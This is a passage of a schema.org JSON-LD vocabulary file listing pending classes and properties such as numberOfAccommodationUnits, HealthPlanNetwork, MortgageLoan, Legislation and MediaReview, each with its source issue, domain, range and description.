"http://schema.org/Intangible" } }, { "@id": "http://schema.org/numberOfAccommodationUnits", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/FloorPlan" }, { "@id": "http://schema.org/ApartmentComplex" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/QuantitativeValue" }, "rdfs:comment": "Indicates the total (available plus unavailable) number of accommodation units in an <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a>, or the number of accommodation units for a specific <a class=\"localLink\" href=\"http://schema.org/FloorPlan\">FloorPlan</a> (within its specific <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a>). See also <a class=\"localLink\" href=\"http://schema.org/numberOfAvailableAccommodationUnits\">numberOfAvailableAccommodationUnits</a>.", "rdfs:label": "numberOfAccommodationUnits" }, { "@id": "http://schema.org/TreatmentsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Treatments or related therapies for a Topic.", "rdfs:label": "TreatmentsHealthAspect" }, { "@id": "http://schema.org/MerchantReturnUnlimitedWindow", "@type": "http://schema.org/MerchantReturnEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MerchantReturnUnlimitedWindow: there is an unlimited window for product returns.", "rdfs:label": "MerchantReturnUnlimitedWindow" }, { "@id": "http://schema.org/SchoolDistrict", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2500" }, "http://schema.org/category": "issue-2500", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A School District is an administrative area for the administration of schools.", "rdfs:label": "SchoolDistrict", "rdfs:subClassOf": { "@id": "http://schema.org/AdministrativeArea" } }, { "@id": "http://schema.org/TypesHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Categorization and other types related to a topic.", "rdfs:label": "TypesHealthAspect" }, { "@id": "http://schema.org/NotInForce", "@type": "http://schema.org/LegalForceStatus", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#InForce-notInForce" }, "rdfs:comment": "Indicates that a legislation is currently not in force.", "rdfs:label": "NotInForce" }, { "@id": "http://schema.org/termCode", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": { "@id": "http://schema.org/DefinedTerm" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A code that identifies this <a class=\"localLink\" href=\"http://schema.org/DefinedTerm\">DefinedTerm</a> within a <a class=\"localLink\" href=\"http://schema.org/DefinedTermSet\">DefinedTermSet</a>", "rdfs:label": "termCode" }, { "@id": "http://schema.org/RestockingFees", "@type": "http://schema.org/ReturnFeesEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "RestockingFees ...", "rdfs:label": "RestockingFees" }, { "@id": "http://schema.org/eventSchedule", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Event" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Schedule" }, "rdfs:comment": "Associates an <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> with a <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a>. There are circumstances where it is preferable to share a schedule for a series of\n repeating events rather than data on the individual events themselves. For example, a website or application might prefer to publish a schedule for a weekly\n gym class rather than provide data on every event. A schedule could be processed by applications to add forthcoming events to a calendar. An <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> that\n is associated with a <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a> using this property should not have <a class=\"localLink\" href=\"http://schema.org/startDate\">startDate</a> or <a class=\"localLink\" href=\"http://schema.org/endDate\">endDate</a> properties. These are instead defined within the associated\n <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a>, this avoids any ambiguity for clients using the data. The property might have repeated values to specify different schedules, e.g. for different months\n or seasons.", "rdfs:label": "eventSchedule" }, { "@id": "http://schema.org/jobTitle", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2192" }, "http://schema.org/category": "issue-2192", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Person" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/DefinedTerm" } ], "rdfs:comment": "The job title of the person (for example, Financial Manager).", "rdfs:label": "jobTitle" }, { "@id": "http://schema.org/numberOfBedrooms", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/ApartmentComplex" }, { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/FloorPlan" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Number" }, { "@id": "http://schema.org/QuantitativeValue" } ], "rdfs:comment": "The total integer number of bedrooms in a some <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>, <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a> or <a class=\"localLink\" href=\"http://schema.org/FloorPlan\">FloorPlan</a>.", "rdfs:label": "numberOfBedrooms" }, { "@id": "http://schema.org/HealthPlanNetwork", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A US-style health insurance plan network.", "rdfs:label": "HealthPlanNetwork", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/ownershipFundingInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/NewsMediaOrganization" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/AboutPage" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "For an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> (often but not necessarily a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>), a description of organizational ownership structure; funding and grants. In a news/media setting, this is with particular reference to editorial independence. Note that the <a class=\"localLink\" href=\"http://schema.org/funder\">funder</a> is also available and can be used to make basic funder information machine-readable.", "rdfs:label": "ownershipFundingInfo", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/creativeWorkStatus", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/987" }, "http://schema.org/category": "issue-987", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTerm" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The status of a creative work in terms of its stage in a lifecycle. Example terms include Incomplete, Draft, Published, Obsolete. Some organizations define a set of terms for the stages of their publication lifecycle.", "rdfs:label": "creativeWorkStatus" }, { "@id": "http://schema.org/educationRequirements", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1698" } ], "http://schema.org/category": [ "issue-1698", "issue-1779" ], "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/JobPosting" }, { "@id": "http://schema.org/Occupation" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/EducationalOccupationalCredential" } ], "rdfs:comment": "Educational background needed for the position or Occupation.", "rdfs:label": "educationRequirements" }, { "@id": "http://schema.org/numConstraints", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/StatisticalPopulation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "Indicates the number of constraints (not counting <a class=\"localLink\" href=\"http://schema.org/populationType\">populationType</a>) defined for a particular <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>. This helps applications understand if they have access to a sufficiently complete description of a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>.", "rdfs:label": "numConstraints" }, { "@id": "http://schema.org/NewsMediaOrganization", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A News/Media organization such as a newspaper or TV station.", "rdfs:label": "NewsMediaOrganization", "rdfs:subClassOf": { "@id": "http://schema.org/Organization" } }, { "@id": "http://schema.org/usesHealthPlanIdStandard", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "The standard for interpreting thePlan ID. The preferred is \"HIOS\". See the Centers for Medicare &amp; Medicaid Services for more details.", "rdfs:label": "usesHealthPlanIdStandard" }, { "@id": "http://schema.org/materialExtent", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1759" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1759" }, "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/QuantitativeValue" } ], "rdfs:comment": "The quantity of the materials being described or an expression of the physical space they occupy.", "rdfs:label": { "@language": "en", "@value": "materialExtent" } }, { "@id": "http://schema.org/ExchangeRefund", "@type": "http://schema.org/RefundTypeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A ExchangeRefund ...", "rdfs:label": "ExchangeRefund" }, { "@id": "http://schema.org/UsageOrScheduleHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about how, when, frequency and dosage of a topic.", "rdfs:label": "UsageOrScheduleHealthAspect" }, { "@id": "http://schema.org/EducationalOccupationalCredential", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, "http://schema.org/category": "issue-1779", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An educational or occupational credential. A diploma, academic degree, certification, qualification, badge, etc., that may be awarded to a person or other entity that meets the requirements defined by the credentialer.", "rdfs:label": "EducationalOccupationalCredential", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/courseWorkload", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1909" }, "http://schema.org/category": "issue-1909", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CourseInstance" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The amount of work expected of students taking the course, often provided as a figure per week or per month, and may be broken down by type. For example, \"2 hours of lectures, 1 hour of lab work and 3 hours of independent study per week\".", "rdfs:label": "courseWorkload" }, { "@id": "http://schema.org/LegalValueLevel", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#closeMatch": { "@id": "http://data.europa.eu/eli/ontology#LegalValue" }, "rdfs:comment": "A list of possible levels for the legal validity of a legislation.", "rdfs:label": "LegalValueLevel", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/hasCategoryCode", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CategoryCodeSet" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/CategoryCode" }, "rdfs:comment": "A Category code contained in this code set.", "rdfs:label": "hasCategoryCode", "rdfs:subPropertyOf": { "@id": "http://schema.org/hasDefinedTerm" } }, { "@id": "http://schema.org/programPrerequisites", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/Course" }, { "@id": "http://schema.org/EducationalOccupationalCredential" }, { "@id": "http://schema.org/AlignmentObject" } ], "rdfs:comment": "Prerequisites for enrolling in the program.", "rdfs:label": "programPrerequisites" }, { "@id": "http://schema.org/downPayment", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/MonetaryAmount" }, { "@id": "http://schema.org/Number" } ], "rdfs:comment": "a type of payment made in cash during the onset of the purchase of an expensive good/service. The payment typically represents only a percentage of the full purchase price.", "rdfs:label": "downPayment" }, { "@id": "http://schema.org/jobLocationType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1591" }, "http://schema.org/category": "issue-1591", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A description of the job location (e.g TELECOMMUTE for telecommute jobs).", "rdfs:label": "jobLocationType" }, { "@id": "http://schema.org/RelatedTopicsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Other prominent or relevant topics tied to the main topic.", "rdfs:label": "RelatedTopicsHealthAspect" }, { "@id": "http://schema.org/Drawing", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1448" }, "http://schema.org/category": "issue-1448", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A picture or diagram made with a pencil, pen, or crayon rather than paint.", "rdfs:label": "Drawing", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/loanRepaymentForm", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LoanOrCredit" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "rdfs:comment": "A form of paying back money previously borrowed from a lender. Repayment usually takes the form of periodic payments that normally include part principal plus interest in each payment.", "rdfs:label": "loanRepaymentForm" }, { "@id": "http://schema.org/termsPerYear", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "The number of times terms of study are offered per year. Semesters and quarters are common units for term. For example, if the student can only take 2 semesters for the program in one year, then termsPerYear should be 2.", "rdfs:label": "termsPerYear" }, { "@id": "http://schema.org/includesHealthPlanNetwork", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/HealthPlanNetwork" }, "rdfs:comment": "Networks covered by this plan.", "rdfs:label": "includesHealthPlanNetwork" }, { "@id": "http://schema.org/MortgageLoan", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A loan in which property or real estate is used as collateral. (A loan securitized against some real estate.)", "rdfs:label": "MortgageLoan", "rdfs:subClassOf": { "@id": "http://schema.org/LoanOrCredit" } }, { "@id": "http://schema.org/floorLimit", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PaymentCard" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "A floor limit is the amount of money above which credit card transactions must be authorized.", "rdfs:label": "floorLimit" }, { "@id": "http://schema.org/BrokerageAccount", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An account that allows an investor to deposit funds and place investment orders with a licensed broker or brokerage firm.", "rdfs:label": "BrokerageAccount", "rdfs:subClassOf": { "@id": "http://schema.org/InvestmentOrDeposit" } }, { "@id": "http://schema.org/diversityStaffingReport", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/NewsMediaOrganization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Article" } ], "rdfs:comment": "For an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> (often but not necessarily a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>), a report on staffing diversity issues. In a news context this might be for example ASNE or RTDNA (US) reports, or self-reported.", "rdfs:label": "diversityStaffingReport", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/merchantReturnDays", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The merchantReturnDays property indicates the number of days (from purchase) within which relevant merchant return policy is applicable.", "rdfs:label": "merchantReturnDays" }, { "@id": "http://schema.org/repeatCount", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "Defines the number of times a recurring <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> will take place", "rdfs:label": "repeatCount" }, { "@id": "http://schema.org/PodcastSeries", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/373" }, "http://schema.org/category": "issue-373", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A podcast is an episodic series of digital audio or video files which a user can download and listen to.", "rdfs:label": "PodcastSeries", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWorkSeries" } }, { "@id": "http://schema.org/missionCoveragePrioritiesPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": { "@id": "http://schema.org/NewsMediaOrganization" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "For a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>, a statement on coverage priorities, including any public agenda or stance on issues.", "rdfs:label": "missionCoveragePrioritiesPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/MayTreatHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Related topics may be treated by a Topic.", "rdfs:label": "MayTreatHealthAspect" }, { "@id": "http://schema.org/Legislation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#closeMatch": [ { "@id": "http://data.europa.eu/eli/ontology#LegalExpression" }, { "@id": "http://data.europa.eu/eli/ontology#LegalResource" } ], "rdfs:comment": "A legal document such as an act, decree, bill, etc. (enforceable or not) or a component of a legal act (like an article).", "rdfs:label": "Legislation", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/diseasePreventionInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/WebContent" } ], "rdfs:comment": "Information about disease prevention.", "rdfs:label": "diseasePreventionInfo" }, { "@id": "http://schema.org/backstory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1688" } ], "http://schema.org/category": "issue-1688", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Article" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "For an <a class=\"localLink\" href=\"http://schema.org/Article\">Article</a>, typically a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a>, the backstory property provides a textual summary giving a brief explanation of why and how an article was created. In a journalistic setting this could include information about reporting process, methods, interviews, data sources, etc.", "rdfs:label": "backstory" }, { "@id": "http://schema.org/ArchiveComponent", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1758" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1758" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An intangible type to be applied to any archive content, carrying with it a set of properties required to describe archival items and collections.", "rdfs:label": { "@language": "en", "@value": "ArchiveComponent" }, "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/numberOfBathroomsTotal", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/FloorPlan" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The total integer number of bathrooms in a some <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>, following real estate conventions as <a href=\"https://ddwiki.reso.org/display/DDW17/BathroomsTotalInteger+Field\">documented in RESO</a>: \"The simple sum of the number of bathrooms. For example for a property with two Full Bathrooms and one Half Bathroom, the Bathrooms Total Integer will be 3.\". See also <a class=\"localLink\" href=\"http://schema.org/numberOfRooms\">numberOfRooms</a>.", "rdfs:label": "numberOfBathroomsTotal" }, { "@id": "http://schema.org/MediaReview", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2450" }, "http://schema.org/category": "issue-2450", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "(editorial work in progress, this definition is incomplete and unreviewed)\n A <a class=\"localLink\" href=\"http://schema.org/MediaReview\">MediaReview</a> is a more specialized form of Review dedicated to the evaluation of media content online, typically in the context of fact-checking and misinformation.\n For more general reviews of media in the broader sense, use <a class=\"localLink\" href=\"http://schema.org/UserReview\">UserReview</a>, <a class=\"localLink\" href=\"http://schema.org/CriticReview\">CriticReview</a> or other <a class=\"localLink\" href=\"http://schema.org/Review\">Review</a> types.", "rdfs:label": "MediaReview", 